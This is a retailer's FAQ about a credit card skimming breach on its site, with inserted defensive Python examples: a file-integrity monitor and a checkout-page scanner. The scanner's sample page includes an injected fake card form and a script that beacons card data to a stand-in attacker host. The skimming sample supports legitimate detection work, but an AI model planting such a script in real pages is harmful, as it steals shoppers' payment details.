We have summarized below the frequently asked questions regarding the "Apology and Notice Regarding the Leakage of Credit Card Information Due to Unauthorized Access to Our Site."
Q) The period during which leakage may have occurred is from November 27, 2020 to December 9, 2020. Are payments I made outside that period safe?
A) The investigation is being carried out by a third-party investigation organization. There is no possibility of leakage other than the 195 credit card payments made during the above period, so payments made outside it are not affected. If you have any questions, please feel free to contact our inquiry desk. In addition, when we analyzed the purchase dates of customers who actually experienced fraudulent use, we found that they were concentrated among customers who made purchases on 12/2, 12/3, 12/4, 12/8, and 12/9.
Q) Will I be able to use the site safely in the future?
A) We take this situation seriously and have implemented all necessary measures to improve security as instructed by a third-party investigation organization. We will continue to strive to improve security and do our best to regain the trust of our customers.
Q) Responding to the unauthorized use, having my card reissued, and updating my payment details took a lot of time. Is there some kind of compensation?
A) As explained in the main text, we will bear all costs of fraudulent use and card replacement. We deeply apologize for the inconvenience caused to our customers, and we apologize once again. We will inform you of any further measures we may take. Thank you for your understanding.
Q) The initial discovery was on December 9, 2020, and the announcement was made on March 29, 2021. Why was the announcement delayed so long?
A) We have been in continuous contact with the credit card companies and the investigation firm with the aim of notifying customers as early as possible, and we apologize that we could not contact you sooner. In our discussions with the credit card companies it was decided not to contact customers before the facts were established, in order to avoid unnecessary confusion. We were able to notify our customers only after the third-party investigation organization completed its investigation and the credit card companies confirmed the findings.
Q) Please tell us about the security improvement measures you have implemented so far.
A) We have taken the following measures to prevent a similar incident from occurring again in the future.
・In addition to immediately fixing the vulnerability in the file upload function, we enabled SELinux to harden the server against tampering. (December 2020)
・We migrated our server environment to a secure public cloud environment built on the latest OS and middleware. (December 2020)
・We introduced a web application firewall (WAF) to block unauthorized access and attacks. (January 2021)
・We introduced two-step authentication for the server environment and management tools. (February 2021)
・We installed anti-virus software on our servers and perform regular virus scans. (February 2021)
・We regularly apply critical OS and middleware patches. (March 2021)
・We introduced a FIM (File Integrity Monitoring) solution to detect file tampering. (April 2021)
・In addition to the above, we have implemented various other security improvements.
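The FIM measure listed above is the control that directly addresses what happened in this incident: a file on the server (the payment page) was modified and a foreign file was placed on it through the upload function. The following is an added example, not the FIM product ApparelX deployed, of what such a monitor does at its core: it hashes every file under a web root with SHA-256 to form a baseline, then reports added, removed, and modified files on the next run. The web root, its contents, and the simulated tampering are constructed in a temporary directory for illustration.

```python
"""Minimal file-integrity monitor: baseline a web root, then detect changes.

Added example; not the FIM solution used by ApparelX. Hashes every file
under a directory and diffs two snapshots. The directory layout below
(checkout/index.html, uploads/s.js) is constructed for the demo.
"""
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Map each file path (relative to root) to its SHA-256 hex digest."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def diff(baseline, current):
    """Return (added, removed, modified) sorted path lists between snapshots."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline
                      if p in current and baseline[p] != current[p])
    return added, removed, modified


def demo():
    """Baseline a constructed web root, simulate tampering, report the diff."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "checkout").mkdir()
        (root / "checkout" / "index.html").write_text(
            "<form action='/pay'></form>\n")
        (root / "uploads").mkdir()
        baseline = snapshot(root)

        # Simulated tampering (constructed, not the real incident files):
        # the checkout page gains an injected script tag, and a new file
        # appears in the upload directory.
        with open(root / "checkout" / "index.html", "a") as f:
            f.write("<script src='/uploads/s.js'></script>\n")
        (root / "uploads" / "s.js").write_text("/* placeholder */\n")

        return diff(baseline, snapshot(root))


if __name__ == "__main__":
    added, removed, modified = demo()
    print("added:", added)
    print("removed:", removed)
    print("modified:", modified)
```

In practice the baseline must be stored where an attacker who can write to the web root cannot also rewrite it (a separate host or append-only storage), the scan must run on a schedule rather than once, and a change to a page that should never change after deployment, such as the checkout page, should raise an alert rather than just a log line.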
Q) Please tell us about the security improvement measures you plan to implement in the future.
A) We plan to implement the following measures under the guidance of the third-party investigation organization and a security specialist company.
・Periodic security diagnosis by a security specialist company.
・Periodic internal vulnerability assessments.
・Long-term retention of logs using a SIEM (Security Information and Event Management) system.
・In addition to the above, we will continue to implement measures to improve the robustness of our systems.
Q) Did you store credit card information (card number, expiration date, security code) on the server?
A) No. We use a PCI DSS compliant non-pass-through (JavaScript-based) payment service provided by Stripe, so customer credit card information is never sent to or stored on our servers. In this attack, the payment page itself was altered: a fake input form closely resembling the original credit card form was placed on the page, and the information entered into it was forwarded to the attacker's site at the moment the payment button was pressed. Because the card data was captured in the customer's browser before it ever reached Stripe, the non-pass-through integration did not by itself prevent this type of attack; the integrity of the page that hosts the form must also be protected.
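The attack described in the answer above leaves a trace in the served page: a form, script, or inline request that points at a host the checkout page has no business talking to. The following is an added example, not code from ApparelX or Stripe, of a check a merchant can run against its own checkout page from outside the server. It parses the HTML, collects every form action, script/img/iframe source, and absolute URL inside inline scripts, and reports any whose host is not on an allowlist. The allowlist (`shop.example`, `js.stripe.com`, `api.stripe.com`), the sample page, and the attacker host `cdn-stat.example.net` are all constructed for the example; it goes slightly beyond the fake-form case by also catching injected scripts and beacons, which are the other common ways a skimmer moves data off a page.

```python
"""Scan a checkout page for skimmer-style exfiltration targets.

Added example, not ApparelX's or Stripe's code. Assumes the merchant's
checkout page may legitimately reference only its own origin and Stripe;
every other host referenced by a form, script, img, iframe, or an absolute
URL inside an inline script is reported. SAMPLE_PAGE is constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the checkout page is allowed to reference (assumption for the demo).
ALLOWED_HOSTS = {"shop.example", "js.stripe.com", "api.stripe.com"}

# Any absolute http(s) URL appearing in inline script text.
_ABS_URL = re.compile(r"""https?://[^\s'"<>]+""")


class CheckoutScanner(HTMLParser):
    """Collect (kind, url) pairs for everything the page points at."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.targets.append(("form action", a["action"]))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.targets.append(("script src", a["src"]))
        elif tag in ("img", "iframe") and a.get("src"):
            self.targets.append((tag + " src", a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data.
        if self._in_script:
            for url in _ABS_URL.findall(data):
                self.targets.append(("inline script", url))


def foreign_targets(html, allowed=ALLOWED_HOSTS):
    """Return (kind, url) pairs whose host is not in the allowlist."""
    scanner = CheckoutScanner()
    scanner.feed(html)
    findings = []
    for kind, url in scanner.targets:
        host = urlparse(url).hostname
        if host is None:
            continue  # relative URL: resolves to the merchant's own origin
        if host not in allowed:
            findings.append((kind, url))
    return findings


# Constructed checkout page: the genuine form, then an injected lookalike
# form and an injected inline script that beacons the card data out.
SAMPLE_PAGE = """
<html><body>
<form id="pay" action="/checkout/confirm" method="post">
  <input name="card-number"><input name="exp"><input name="cvc">
  <button>Pay</button>
</form>
<form id="pay2" action="https://cdn-stat.example.net/pay" method="post">
  <input name="card-number"><input name="exp"><input name="cvc">
  <button>Pay</button>
</form>
<script src="https://js.stripe.com/v3/"></script>
<script>
  document.getElementById('pay2').addEventListener('submit', function () {
    navigator.sendBeacon('https://cdn-stat.example.net/collect',
                         new FormData(this));
  });
</script>
</body></html>
"""


def scan_sample():
    """Run the check over the constructed page."""
    return foreign_targets(SAMPLE_PAGE)


if __name__ == "__main__":
    for kind, url in scan_sample():
        print("FOREIGN", kind, "->", url)
```

Two caveats matter here. The scan must fetch the page the way a customer's browser does (from outside, with a browser-like User-Agent), because skimmers are sometimes served only to real visitors; and, as the answer below on whether information was actually leaked points out, the fake form on this site was apparently present only intermittently, so a single scan proves little; the check has to run on a schedule and its results compared over time.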
Q) What does it mean that my credit card information "may have been" compromised? Is it possible that it was not actually leaked?
A) We have not been able to confirm that any information was actually transferred to the attacker's site, but we are treating every card used for payment during the period in which the attack file existed on the server as possibly affected and proceeding on that basis. It is therefore possible that some customers who paid during this period were not actually affected. When we analyzed the purchase dates of customers who actually experienced fraudulent use, we found that they were concentrated among customers who made purchases on 12/2, 12/3, 12/4, 12/8, and 12/9, and it is possible that the fake form was withdrawn during the other parts of the period (*our company has in fact confirmed this).
Q) How will I be reimbursed in the event of unauthorized use? Also, will there be a charge for replacing the card?
A) You will not be responsible for any costs incurred in connection with this incident. As stated in the main text of the report, please check your credit card statement and be sure to contact your credit card company if you find any unauthorized use.
Q) Will ApparelX continue to provide services?
A) We take this situation seriously and have implemented all necessary measures to improve security as instructed by a third-party investigation organization. We will continue to strive to improve security and do our best to regain the trust of our customers.
Q) I would like to cancel my ApparelX membership and have all my information deleted.
A) Please use the account deletion function in My Account. All information stored on our site will be deleted.
Q) When will you resume accepting credit card payments?
A) We are currently in discussions with the payment processing company. We will make an announcement on the website when we reopen. (Added on 4/28) After receiving approval from each card company, we resumed credit card payments on 4/28/2021.